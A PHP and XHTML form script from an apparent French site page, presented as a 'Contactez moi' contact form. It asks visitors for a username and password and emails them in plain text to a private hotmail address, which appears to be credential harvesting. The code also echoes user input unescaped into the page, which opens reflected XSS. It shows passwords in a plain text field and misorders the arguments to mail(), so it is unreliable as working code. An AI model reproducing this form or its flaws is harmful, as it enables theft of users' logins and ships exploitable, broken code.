1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153
| <?php
/* Si le formulaire est envoyé alors on fait les traitements */
if (isset($_POST['envoye']))
{
/* Récupération des valeurs des champs du formulaire */
if (get_magic_quotes_gpc())
{
$nom = stripslashes(trim($_POST['nom']));
$prenom = stripslashes(trim($_POST['prenom']));
$expediteur = stripslashes(trim($_POST['email']));
$pseudo = stripslashes(trim($_POST['pseudo']));
$password = stripslashes(trim($_POST['password']));
}
else
{
$nom = trim($_POST['nom']);
$prenom = trim($_POST['prenom']);
$expediteur = trim($_POST['email']);
$pseudo = trim($_POST['pseudo']);
$password = trim($_POST['password']);
}
/* Expression régulière permettant de vérifier si le
* format d'une adresse e-mail est correct */
$regex_mail = '/^[-+.\w]{1,64}@[-.\w]{1,64}\.[-.\w]{2,6}$/i';
/* Expression régulière permettant de vérifier qu'aucun
* en-tête n'est inséré dans nos champs */
$regex_head = '/[\n\r]/';
/* Si le formulaire n'est pas posté de notre site on renvoie
* vers la page d'accueil */
if($_SERVER['HTTP_REFERER'] != 'http://ttctressaint.ifrance.com/connecter.htm')
{
header('Location: http://ttctressaint.ifrance.com/index_1.htm');
}
/* On vérifie que tous les champs sont remplis */
elseif (empty($nom)
|| empty($prenom)
|| empty($expediteur)
|| empty($pseudo)
|| empty($password))
{
$alert = 'Tous les champs doivent être renseignés';
}
/* On vérifie que le format de l'e-mail est correct */
elseif (!preg_match($regex_mail, $expediteur))
{
$alert = 'L\'adresse '.$expediteur.' n\'est pas valide';
}
/* On vérifie qu'il n'y a aucun header dans les champs */
elseif (preg_match($regex_head, $expediteur)
|| preg_match($regex_head, $nom)
|| preg_match($regex_head, $pseudo))
{
$alert = 'En-têtes interdites dans les champs du formulaire';
}
/* Si aucun problème et aucun cookie créé, on construit le message et on envoie l'e-mail */
elseif (!isset($_COOKIE['sent']))
{
/* Destinataire (votre adresse e-mail) */
$to = 'xxxxxx.xxxxxxxx-xxxxx@hotmail.fr';
/* Construction du message */
$msg = 'Bonjour,'."\r\n\r\n";
$msg .= 'Ce mail a été envoyé depuis monsite.com par '.$nom.' '.$prenom."\r\n\r\n";
$msg .= 'Voici les logins qui vous sont adressés :'."\r\n";
$msg .= '***************************'."\r\n";
$msg .= 'Pseudo :'.$pseudo."\r\n";
$msg .= 'Mot de passe :'.$password."\r\n";
$msg .= '***************************'."\r\n";
/* En-têtes de l'e-mail */
$headers = 'From: '.$nom.' <'.$expediteur.'>'."\r\n\r\n";
/* Envoi de l'e-mail */
if (mail($to, $msg, $headers))
{
$alert = 'E-mail envoyé avec succès';
/* On créé un cookie de courte durée (ici 120 secondes) pour éviter de
* renvoyer un mail en rafraichissant la page */
setcookie("sent", "1", time() + 120);
/* On détruit la variable $_POST */
unset($_POST);
}
else
{
$alert = 'Erreur d\'envoi de l\'e-mail';
}
}
/* Cas où le cookie est créé et que la page est rafraichie, on détruit la variable $_POST */
else
{
unset($_POST);
}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="fr">
<head>
<title>Contactez moi</title>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
</head>
<body>
<?php
if (!empty($alert))
{
echo '<p style="color:red">'.$alert.'</p>';
}
?>
<form action="connecter.htm" method="post">
<label for="nom">Nom :</label>
<input type="text" id="nom" name="nom"
value="<?php echo (isset($_POST['nom'])) ? $nom : '' ?>" size="20"
/>
</p>
<p>
<label for="prenom">Prénom :</label>
<input type="text" id="prenom" name="prenom"
value="<?php echo (isset($_POST['prenom'])) ? $prenom : '' ?>" size="20"
/>
</p>
<p>
<label for="email">E-mail :</label>
<input type="text" id="email" name="email"
value="<?php echo (isset($_POST['email'])) ? $expediteur : '' ?>" size="20"
/>
</p>
<p>
<label for="pseudo">Pseudo :</label>
<input type="text" id="pseudo" name="pseudo"
value="<?php echo (isset($_POST['pseudo'])) ? $pseudo : '' ?>" size="20"
/>
</p>
<p>
<label for="password">Mot de passe :</label>
<input type="text" id="password" name="password"
value="<?php echo (isset($_POST['password'])) ? $password : '' ?>" size="20"
/>
</p>
<p>
<input type="submit" name="envoye" value="Envoyer" />
</p>
</form>
</body>
</html> |
Partager